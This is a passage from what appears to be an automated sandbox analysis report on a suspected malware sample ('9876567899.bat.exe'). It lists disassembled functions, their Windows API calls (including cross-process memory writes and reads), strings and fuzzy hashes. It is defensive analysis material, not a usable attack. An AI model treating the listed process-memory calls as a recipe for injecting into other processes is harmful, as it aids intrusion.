GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00770FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00770FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00771002

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c84b9f9112ddd362d23c68a5d5b12e06629704078015a9a5ada51348eddd64fe
Instruction ID: b055de372fca47096504a2e6dbc4f591dc2f7294cf93cd6cc5555b26eeecb0b7
Opcode Fuzzy Hash: c84b9f9112ddd362d23c68a5d5b12e06629704078015a9a5ada51348eddd64fe
Instruction Fuzzy Hash: E9F04975200305BBDB224FA8DC4AF573BADEFCA7A2F508414FA49C6251DE78DC50CA60

Function 00771014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0077102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00771036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00771045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0077104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00771062

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 3fbfc60b5aa9ab7833dea4a31f4f01cd5fafe612dd1ba8d0895886fcc9bf9ef3
Instruction ID: 9ffa0270f2a9dc9731848d2d9b7903a26368646768462ebe5e871ad0ca6e6538
Opcode Fuzzy Hash: 3fbfc60b5aa9ab7833dea4a31f4f01cd5fafe612dd1ba8d0895886fcc9bf9ef3
Instruction Fuzzy Hash: 1CF03775200305BBDB225FA8EC49A563BADEF8A6A1F508414FA4986250DA78D8508A60

Function 0078030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0078017D,?,007832FC,?,00000001,00752592,?), ref: 00780324
CloseHandle.KERNEL32(?,?,?,?,0078017D,?,007832FC,?,00000001,00752592,?), ref: 00780331
CloseHandle.KERNEL32(?,?,?,?,0078017D,?,007832FC,?,00000001,00752592,?), ref: 0078033E
CloseHandle.KERNEL32(?,?,?,?,0078017D,?,007832FC,?,00000001,00752592,?), ref: 0078034B
CloseHandle.KERNEL32(?,?,?,?,0078017D,?,007832FC,?,00000001,00752592,?), ref: 00780358
CloseHandle.KERNEL32(?,?,?,?,0078017D,?,007832FC,?,00000001,00752592,?), ref: 00780365

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a1dd6b7a2562ecc66a26464acf587d65669c6cba39b52378367a88d64a27ab17
Instruction ID: 4278d09b166396528bf5fb1deac67c3ff72df9a38201d529b9aa2a1336a10f3e
Opcode Fuzzy Hash: a1dd6b7a2562ecc66a26464acf587d65669c6cba39b52378367a88d64a27ab17
Instruction Fuzzy Hash: B501AA72801B15DFCB30AF66D880812FBF9BF603153158A3FD1A692931C7B5A998DF80

Function 0074D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0074D752

Part of subcall function 007429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000), ref: 007429DE
Part of subcall function 007429C8: GetLastError.KERNEL32(00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000,00000000), ref: 007429F0

_free.LIBCMT ref: 0074D764
_free.LIBCMT ref: 0074D776
_free.LIBCMT ref: 0074D788
_free.LIBCMT ref: 0074D79A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1ed2ef87f7952582b06e7fa24c89eeb3af820dde89be3e4b5f78d11d7c739a0f
Instruction ID: ec6f8f4b9bf33524adf3adef0e2584a4453a8aec0bb6ef1bc94fcb935d3dd295
Opcode Fuzzy Hash: 1ed2ef87f7952582b06e7fa24c89eeb3af820dde89be3e4b5f78d11d7c739a0f
Instruction Fuzzy Hash: 93F01232545205AB9633EB65F9C5C167BEDBB447107D54C06F088E7512C73CFC908A64

Function 00775C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00775C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00775C6F
MessageBeep.USER32(00000000), ref: 00775C87
KillTimer.USER32(?,0000040A), ref: 00775CA3
EndDialog.USER32(?,00000001), ref: 00775CBD

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: e4ee66bec887d26b28aa99b459cd0f80aa01c7ad18a78a3275d30c147e812468
Instruction ID: da582877b8aed7f676cd6d77dd1810d49af0fe77c94136bebdd9266743ec1f19
Opcode Fuzzy Hash: e4ee66bec887d26b28aa99b459cd0f80aa01c7ad18a78a3275d30c147e812468
Instruction Fuzzy Hash: 0F018130500B05ABEF229B10DD4EFA677B8BB41B45F049569A587A10E1DBF8A9848AA4

Function 007422A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007422BE

Part of subcall function 007429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000), ref: 007429DE
Part of subcall function 007429C8: GetLastError.KERNEL32(00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000,00000000), ref: 007429F0

_free.LIBCMT ref: 007422D0
_free.LIBCMT ref: 007422E3
_free.LIBCMT ref: 007422F4
_free.LIBCMT ref: 00742305

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 21ce87950c1e94388ac6635b4797d6af451f7902e97af4886dc00645677d6ccd
Instruction ID: aa4126a23027dc76d42fda70bb528be4c09cd17f221a1029c461069e8902e76a
Opcode Fuzzy Hash: 21ce87950c1e94388ac6635b4797d6af451f7902e97af4886dc00645677d6ccd
Instruction Fuzzy Hash: CDF03A709021A19B9A13AF55BC8680C3B68F71C760781850BF410EA2B2C77D2873EFEC

Function 007295C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 007295D4
StrokeAndFillPath.GDI32(?,?,007671F7,00000000,?,?,?), ref: 007295F0
SelectObject.GDI32(?,00000000), ref: 00729603
DeleteObject.GDI32 ref: 00729616
StrokePath.GDI32(?), ref: 00729631

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: cfaa1e1d0ad170192dfcbee496248f0e4741dbfea55e267cf21a96eecae9597f
Instruction ID: e8fc2614c2ad8cbdbdc29e75b13cc9162f029d6e8b366f1a9607001f41247d9f
Opcode Fuzzy Hash: cfaa1e1d0ad170192dfcbee496248f0e4741dbfea55e267cf21a96eecae9597f
Instruction Fuzzy Hash: D6F03C30006288EBDB135F65ED5D7A53BA1AB46322F48C214F525590F2DB3C99A1DF28

Function 00740F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 007410F9
__freea.LIBCMT ref: 00741117

Part of subcall function 00741537: _free.LIBCMT ref: 0074154F

Strings

a/p, xrefs: 007411DE
am/pm, xrefs: 0074117A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: e43ad88c79126362eedff591aaeced324cca744c88659b5191a0f09e99e2e7bf
Instruction ID: a3e4aaac37e706634ee21717f47f2cc24499652aa2c23d7ae5809e699cced3c7
Opcode Fuzzy Hash: e43ad88c79126362eedff591aaeced324cca744c88659b5191a0f09e99e2e7bf
Instruction Fuzzy Hash: E3D12631A1020ACADB24BF68C895BFEBBB0FF06700FA44159E915AB651D37D9DC0CB91

Function 007961D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00730242: EnterCriticalSection.KERNEL32(007E070C,007E1884,?,?,0072198B,007E2518,?,?,?,007112F9,00000000), ref: 0073024D
Part of subcall function 00730242: LeaveCriticalSection.KERNEL32(007E070C,?,0072198B,007E2518,?,?,?,007112F9,00000000), ref: 0073028A

Part of subcall function 007300A3: __onexit.LIBCMT ref: 007300A9

__Init_thread_footer.LIBCMT ref: 00796238

Part of subcall function 007301F8: EnterCriticalSection.KERNEL32(007E070C,?,?,00728747,007E2514), ref: 00730202
Part of subcall function 007301F8: LeaveCriticalSection.KERNEL32(007E070C,?,00728747,007E2514), ref: 00730235

Part of subcall function 0078359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007835E4
Part of subcall function 0078359C: LoadStringW.USER32(007E2390,?,00000FFF,?), ref: 0078360A

Strings

x#~, xrefs: 0079633A
x#~, xrefs: 0079636F
x#~, xrefs: 00796353

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#~$x#~$x#~
API String ID: 1072379062-2863289283
Opcode ID: 913643103220ab5bf2dfba791544ff30417b77308633f75498b87070fac47ad2
Instruction ID: eafce2cd303131ee20826498f8160389b73c3ed681582683a724d9f939c552ad
Opcode Fuzzy Hash: 913643103220ab5bf2dfba791544ff30417b77308633f75498b87070fac47ad2
Instruction Fuzzy Hash: 59C17B71A00105EBCF14DF98D895EAEB7B9FF48300F118169E9059B291DB78EE55CBA0

Function 00745AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

JOq, xrefs: 00745BA8, 00745C6C

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID: JOq
API String ID: 0-3534734180
Opcode ID: e4678fa9163d5b08d7a1d883f3fc0505f1960f44e12959e7dd3353cac585b17d
Instruction ID: 063e01e8f0fdc428b25bb58e86d10e27447b6ccd27855c5071f4eafcac0cba55
Opcode Fuzzy Hash: e4678fa9163d5b08d7a1d883f3fc0505f1960f44e12959e7dd3353cac585b17d
Instruction Fuzzy Hash: 9451A0B1E0060AEFDB119FA4C889FAEBBB8EF45310F14015AF405A7293D77D9901CB61

Function 00748A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00748B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00748B7A
__dosmaperr.LIBCMT ref: 00748B81

Strings

.s, xrefs: 00748A63

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .s
API String ID: 2434981716-1621786184
Opcode ID: d5ef8f52ef2e641989797162c82c2e270fd3fb75832694c9bfaa1fde14e96f2a
Instruction ID: eb9c0f856505561f43bf5fe67708360ff636d3c5059cde2aa50ca550a901da69
Opcode Fuzzy Hash: d5ef8f52ef2e641989797162c82c2e270fd3fb75832694c9bfaa1fde14e96f2a
Instruction Fuzzy Hash: B8418CF060404DAFDB659F24C884A7D7FA5EB86314F2881AAF8948B242DF798C42D795

Function 00772716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0077B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007721D0,?,?,00000034,00000800,?,00000034), ref: 0077B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00772760

Part of subcall function 0077B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0077B3F8

Part of subcall function 0077B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0077B355
Part of subcall function 0077B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00772194,00000034,?,?,00001004,00000000,00000000), ref: 0077B365
Part of subcall function 0077B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00772194,00000034,?,?,00001004,00000000,00000000), ref: 0077B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007727CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0077281A

Strings

@, xrefs: 00772832

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 23bb8b71d85cd8879e65ab9d210f2e8b9a6e5facb30b5e42597ee6e36c200bfa
Instruction ID: c78681f9650acc9ec7070a88361db9ef1fbc1b9e2d3ab878026e1fae3879c0d9
Opcode Fuzzy Hash: 23bb8b71d85cd8879e65ab9d210f2e8b9a6e5facb30b5e42597ee6e36c200bfa
Instruction Fuzzy Hash: FB412A72900218AFDF10DBA4CD45BEEBBB8EF09740F008095FA59B7181DB756E85CBA1

Function 0074172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\9876567899.bat.exe,00000104), ref: 00741769
_free.LIBCMT ref: 00741834
_free.LIBCMT ref: 0074183E

Strings

C:\Users\user\Desktop\9876567899.bat.exe, xrefs: 00741760, 00741767, 00741796, 007417CE

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\9876567899.bat.exe
API String ID: 2506810119-2253961750
Opcode ID: 9903ab0c4833eb62d778178da8a0d9092c6e3bd82f8b62330502d2e225b1aedc
Instruction ID: 42ecaecbe6d13cd91172d1e9b3cf9887c452aa4d6882d5d7741e57c9efae8f25
Opcode Fuzzy Hash: 9903ab0c4833eb62d778178da8a0d9092c6e3bd82f8b62330502d2e225b1aedc
Instruction Fuzzy Hash: 77318271A40258EFDB22EB99DC85D9EBBFCEB89310B944166F504DB211D7784E80CB90

Function 0077C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0077C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0077C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007E1990,012F55D0), ref: 0077C395

Strings

0, xrefs: 0077C2DF

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 7fe1bfeb7e3147d4b26451bb72c416c2a53689bcb75bd5ea6992520e9943b5fe
Instruction ID: 4737767276df15b6840c2ad0672327837c2f12177ae254941f3ee5680d9bd4e8
Opcode Fuzzy Hash: 7fe1bfeb7e3147d4b26451bb72c416c2a53689bcb75bd5ea6992520e9943b5fe
Instruction Fuzzy Hash: C9418071204301DFDB21DF25D885B5ABBE4AF89360F14C61DF9A9972D1D738A904CB62

Function 007A4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007ACC08,00000000,?,?,?,?), ref: 007A44AA
GetWindowLongW.USER32 ref: 007A44C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 007A44D7

Strings

SysTreeView32, xrefs: 007A447C

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 35fc212d16b9ba6e3fb0883bdc34107300583c0069bcf6936e15d10f309bb1f4
Instruction ID: 41c858362b6291223d97be3651dbd60a672dfadb6e35541803954c5e21f352b7
Opcode Fuzzy Hash: 35fc212d16b9ba6e3fb0883bdc34107300583c0069bcf6936e15d10f309bb1f4
Instruction Fuzzy Hash: 9831AD71200245AFDB218F78DC45BEA77A9EB8A334F204725F975921D0D7B9EC509B50

Function 00776E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00776EED
VariantCopyInd.OLEAUT32(?,?), ref: 00776F08
VariantClear.OLEAUT32(?), ref: 00776F12

Strings

*jw, xrefs: 00776E8B, 00776E90, 00776EF8

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *jw
API String ID: 2173805711-2615704982
Opcode ID: bc73a657917de3d09f5e5bea73c97e0a082f87b43bf965aad1fd5ae8a6fc7e6b
Instruction ID: 9353b39d648c6cb00b96d8038f9c756c1c6b70e4a807ee4f907edc55e2f72912
Opcode Fuzzy Hash: bc73a657917de3d09f5e5bea73c97e0a082f87b43bf965aad1fd5ae8a6fc7e6b
Instruction Fuzzy Hash: 52310231604646DFCF05AFA8E8548BD37B6FF85740B1084A8F8065B2A1C73C9D52CBD4

Function 0079304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0079335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00793077,?,?), ref: 00793378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0079307A
_wcslen.LIBCMT ref: 0079309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00793106

Strings

255.255.255.255, xrefs: 00793095, 0079309A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
